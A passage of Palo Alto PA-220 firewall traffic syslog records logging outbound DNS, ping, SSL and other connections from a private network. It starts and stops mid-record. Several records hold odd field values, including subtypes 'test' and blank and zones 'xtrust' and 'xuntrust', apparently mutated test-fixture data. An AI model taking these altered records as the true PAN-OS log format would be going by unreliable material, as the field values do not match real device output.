16:09:24,192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24063,1,54061,53,2987,53,0x400019,udp,allow,392,85,307,2,2018/11/30 16:08:52,0,any,0,32091125,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24145,1,52701,53,6945,53,0x400019,udp,allow,440,75,365,2,2018/11/30 16:08:52,0,any,0,32091126,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:28 PA-220 1,2018/11/30 16:09:27,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:27,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:27,24245,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:13,0,any,0,32091127,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:28 PA-220 1,2018/11/30 16:09:27,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:27,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:27,24167,1,62503,53,42208,53,0x400019,udp,allow,258,97,161,2,2018/11/30 16:08:54,1,any,0,32091128,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:29 PA-220 1,2018/11/30 16:09:28,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:28,192.168.15.224,98.138.49.44,192.168.1.63,98.138.49.44,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:28,24212,1,52442,443,14660,443,0x40001c,tcp,allow,9891,2086,7805,27,2018/11/30 16:08:54,17,web-advertisements,0,32091129,0x0,192.168.0.0-192.168.255.255,United States,0,14,13,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:29 PA-220 1,2018/11/30 16:09:28,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:28,192.168.15.224,72.30.3.43,192.168.1.63,72.30.3.43,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:28,24149,1,52441,443,16483,443,0x40001c,tcp,allow,8460,2354,6106,24,2018/11/30 16:08:54,17,web-advertisements,0,32091130,0x0,192.168.0.0-192.168.255.255,United States,0,13,11,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:30 PA-220 1,2018/11/30 16:09:29,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:29,192.168.15.196,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:29,24185,2,0,0,0,0,0x500019,icmp,allow,392,196,196,4,2018/11/30 16:09:15,0,any,0,32091131,0x0,192.168.0.0-192.168.255.255,United States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:30 PA-220 1,2018/11/30 16:09:29,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:29,192.168.15.224,172.217.9.142,192.168.1.63,172.217.9.142,new_outbound_from_trust,,,ocsp,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:29,23856,1,52355,80,5570,80,0x40001c,tcp,allow,5790,2545,3245,36,2018/11/30 16:07:16,116,computer-and-internet-info,0,32091132,0x0,192.168.0.0-192.168.255.255,United States,0,19,17,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:30 PA-220 1,2018/11/30 16:09:29,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:29,192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:29,24173,1,50196,53,24430,53,0x400019,udp,allow,261,82,179,2,2018/11/30 16:08:57,0,any,0,32091133,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:31 PA-220 1,2018/11/30 16:09:30,012801096514,TRAFFIC,start,2049,2018/11/30 16:09:30,192.168.15.224,54.84.80.198,192.168.1.63,54.84.80.198,new_outbound_from_trust,,,traps-management-service,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:30,24257,1,52454,443,12122,443,0x400053,tcp,allow,6295,1758,4537,25,2018/11/30 16:09:13,0,computer-and-internet-info,0,32091134,0x0,192.168.0.0-192.168.255.255,United States,0,13,12,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:33 PA-220 1,2018/11/30 16:09:32,012801096514,TRAFFIC,drop,2049,2018/11/30 16:09:32,192.168.15.224,199.167.55.52,192.168.1.63,199.167.55.52,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:32,24090,1,52445,4282,49145,4282,0x400019,tcp,allow,624,624,0,8,2018/11/30 16:09:12,13,any,0,32091135,0x0,192.168.0.0-192.168.255.255,United States,0,8,0,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:34 PA-220 1,2018/11/30 16:09:33,012801096514,TRAFFIC,deny,2049,2018/11/30 16:09:33,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:33,24242,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:19,0,any,0,32091136,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:35 PA-220 1,2018/11/30 16:09:34,012801096514,TRAFFIC,,2049,2018/11/30 16:09:34,192.168.15.210,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:34,24190,1,35485,53,33110,53,0x400019,udp,allow,215,85,130,2,2018/11/30 16:09:02,0,any,0,32091137,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:38 PA-220 1,2018/11/30 16:09:37,012801096514,TRAFFIC,test,2049,2018/11/30 16:09:37,192.168.15.224,172.217.9.142,192.168.1.63,172.217.9.142,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:37,23892,1,62730,443,9299,443,0x400019,udp,allow,4867,2876,1991,12,2018/11/30 16:07:20,15,any,0,32091138,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:39 PA-220 1,2018/11/30 16:09:38,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:38,192.168.15.224,151.101.2.2,192.168.1.63,151.101.2.2,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:38,24360,1,52506,443,47194,443,0x40001c,tcp,allow,1623,1100,523,13,2018/11/30 16:09:21,0,business-and-economy,0,32091139,0x0,192.168.0.0-192.168.255.255,United States,0,8,5,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:39 PA-220 1,2018/11/30 16:09:38,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:38,192.168.15.224,216.58.194.66,192.168.1.63,216.58.194.66,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:38,23952,1,60596,443,62921,443,0x400019,udp,allow,4405,1977,2428,9,2018/11/30 16:07:36,0,any,0,32091140,0x0,192.168.0.0-192.168.255.255,United States,0,5,4,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:40 PA-220 1,2018/11/30 16:09:39,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:39,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:39,24328,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:25,0,any,0,32091141,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:40 PA-220 1,2018/11/30 16:09:39,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:39,192.168.15.210,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:39,24385,2,0,0,0,0,0x500019,icmp,allow,392,196,196,4,2018/11/30 16:09:25,0,any,0,32091142,0x0,192.168.0.0-192.168.255.255,United States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:40 PA-220 1,2018/11/30 16:09:39,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:39,192.168.15.224,184.51.253.193,192.168.1.63,184.51.253.193,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:39,24172,1,52514,443,41958,443,0x40001c,tcp,allow,7231,2228,5003,22,2018/11/30 16:09:22,0,web-advertisements,0,32091143,0x0,192.168.0.0-192.168.255.255,United States,0,12,10,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:41 PA-220 1,2018/11/30 16:09:40,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:40,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:40,24131,1,55155,53,51374,53,0x400019,udp,allow,267,96,171,2,2018/11/30 16:09:08,0,any,0,32091144,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:41 PA-220 1,2018/11/30 16:09:40,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:40,192.168.15.224,199.167.55.52,192.168.1.63,199.167.55.52,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:40,24393,1,52445,4282,25566,4282,0x400019,tcp,allow,78,78,0,1,2018/11/30 16:09:33,0,any,0,32091145,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:43 PA-220 1,2018/11/30 16:09:42,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:42,192.168.15.224,199.167.52.219,192.168.1.63,199.167.52.219,new_outbound_from_trust,,,tanium,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:42,24976,1,52516,17472,63757,17472,0x40005e,tcp,allow,3402,1086,2316,20,2018/11/30 16:09:25,0,any,0,32091146,0x0,192.168.0.0-192.168.255.255,United States,0,11,9,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:43 PA-220 1,2018/11/30 16:09:42,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:42,192.168.15.224,52.71.117.196,192.168.1.63,52.71.117.196,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:42,24348,1,52511,443,3803,443,0x400053,tcp,allow,16594,2628,13966,38,2018/11/30 16:09:21,4,computer-and-internet-info,0,32091147,0x0,192.168.0.0-192.168.255.255,United States,0,19,19,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24046,1,3018,53,34994,53,0x400019,udp,allow,323,79,244,2,2018/11/30 16:09:12,0,any,0,32091148,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24196,1,16569,53,38064,53,0x400019,udp,allow,300,95,205,2,2018/11/30 16:09:12,0,any,0,32091149,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,35.186.194.41,192.168.1.63,35.186.194.41,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24264,1,52479,443,42924,443,0x400053,tcp,allow,6598,4296,2302,44,2018/11/30 16:09:19,8,insufficient-content,0,32091150,0x0,192.168.0.0-192.168.255.255,United States,0,24,20,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,35.201.124.9,192.168.1.63,35.201.124.9,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24248,1,52478,443,58977,443,0x400053,tcp,allow,65588,58831,6757,104,2018/11/30 16:09:19,8,insufficient-content,0,32091151,0x0,192.168.0.0-192.168.255.255,Asia Pacific Region,0,63,41,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,100.24.131.237,192.168.1.63,100.24.131.237,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24268,1,52502,443,64732,443,0x400053,tcp,allow,13076,4069,9007,32,2018/11/30 16:09:21,6,business-and-economy,0,32091152,0x0,192.168.0.0-192.168.255.255,United States,0,17,15,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,184.51.252.247,192.168.1.63,184.51.252.247,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24175,1,52458,443,58292,443,0x40001c,tcp,allow,1761,1100,661,15,2018/11/30 16:09:14,13,computer-and-internet-info,0,32091153,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,35.190.88.148,192.168.1.63,35.190.88.148,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24312,1,52484,443,32209,443,0x400053,tcp,allow,14732,3596,11136,31,2018/11/30 16:09:19,8,computer-and-internet-info,0,32091154,0x0,192.168.0.0-192.168.255.255,United States,0,15,16,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,35.186.243.83,192.168.1.63,35.186.243.83,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24164,1,52482,443,38822,443,0x400053,tcp,allow,14732,3596,11136,31,2018/11/30 16:09:19,8,computer-and-internet-info,0,32091155,0x0,192.168.0.0-192.168.255.255,United States,0,15,16,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,untrust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24198,1,33769,53,16044,53,0x400019,udp,allow,266,84,182,2,2018/11/30 16:09:12,0,any,0,32091156,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,trust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24184,1,14106,53,56614,53,0x400019,udp,allow,164,74,90,2,2018/11/30 16:09:12,0,any,0,32091157,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,100.24.165.74,192.168.1.63,100.24.165.74,new_outbound_from_trust,,,ssl,vsys1,untrust,trust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24314,1,52503,443,53168,443,0x400053,tcp,allow,9400,2731,6669,30,2018/11/30 16:09:21,6,business-and-economy,0,32091158,0x0,192.168.0.0-192.168.255.255,United States,0,17,13,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,184.51.252.247,192.168.1.63,184.51.252.247,new_outbound_from_trust,,,ssl,vsys1,xtrust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24204,1,52459,443,28012,443,0x40001c,tcp,allow,1761,1100,661,15,2018/11/30 16:09:14,13,computer-and-internet-info,0,32091159,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,35.201.94.140,192.168.1.63,35.201.94.140,new_outbound_from_trust,,,ssl,vsys1,trust,xuntrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24234,1,52483,443,16050,443,0x400053,tcp,allow,14732,3596,11136,31,2018/11/30 16:09:19,8,computer-and-internet-info,0,32091160,0x0,192.168.0.0-192.168.255.255,Asia Pacific Region,0,15,16,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,,,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24390,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:31,0,any,0,32091161,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24093,1,38663,53,61722,53,0x400019,udp,allow,228,84,144,2,2018/11/30 16:09:13,0,any,0,32091162,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24117,1,50443,53,14247,53,0x400019,udp,allow,337,131,206,2,2018/11/30 16:09:13,0,any,0,32091163,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24142,1,54215,53,33580,53,0x400019,udp,allow,337,131,206,2,2018/11/30 16:09:13,0,any,0,32091164,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24195,1,35827,53,13498,53,0x400019,udp,allow,252,83,169,2,2018/11/30 16:09:13,0,any,0,32091165,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24124,1,60609,53,20365,53,0x400019,udp,allow,232,100,132,2,2018/11/30 16:09:13,0,any,0,32091166,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24153,1,3248,53,61464,53,0x400019,udp,allow,206,79,127,2,2018/11/30 16:09:13,0,any,0,32091167,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.196,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24122,1,49284,53,42877,53,0x400019,udp,allow,194,89,105,2,2018/11/30 16:09:13,0,any,0,32091168,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24171,1,57732,53,5918,53,0x400019,udp,allow,269,97,172,2,2018/11/30 16:09:13,0,any,0,32091169,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24069,1,49195,53,28944,53,0x400019,udp,allow,212,78,134,2,2018/11/30 16:09:13,0,any,0,32091170,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24282,1,17266,53,13415,53,0x400019,udp,allow,252,73,179,2,2018/11/30 16:09:13,0,any,0,32091171,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24218,1,48631,53,2489,53,0x400019,udp,allow,308,90,218,2,2018/11/30 16:09:13,0,any,0,32091172,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24200,1,58540,53,49328,53,0x400019,udp,allow,249,77,172,2,2018/11/30 16:09:13,0,any,0,32091173,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24224,1,42678,53,36036,53,0x400019,udp,allow,379,74,305,2,2018/11/30 16:09:13,0,any,0,32091174,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,66.28.0.45,192.168.1.63,66.28.0.45,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24240,1,16576,53,33744,53,0x400019,udp,allow,603,76,527,2,2018/11/30 16:09:14,0,any,0,32091175,0x0,192.168.0.0-192.168.255.255,United 